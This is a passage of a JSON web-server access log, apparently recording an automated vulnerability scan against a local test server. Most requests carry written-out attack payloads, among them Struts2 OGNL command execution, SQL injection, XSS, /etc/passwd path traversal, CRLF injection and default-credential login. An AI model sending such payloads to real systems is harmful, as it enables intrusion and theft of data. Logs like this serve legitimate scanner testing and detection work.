+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@WillBeReplaced.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email/unsubscribed?email=test@gmail.com%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie%3Acrlfinjection/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\x5C0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'29KAY965KUKrMpaz83pCdcO0Bf0'); INSERT INTO extra_field_options(option_value) VALUES ('29KAY965KUKrMpaz83pCdcO0Bf0'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '29KAY965KUKrMpaz83pCdcO0Bf0', 16,0) ON DUPLICATE KEY UPDATE tag='29KAY965KUKrMpaz83pCdcO0Bf0', field_id=16, count=0; -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"action=login&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?layout=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /script/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:35 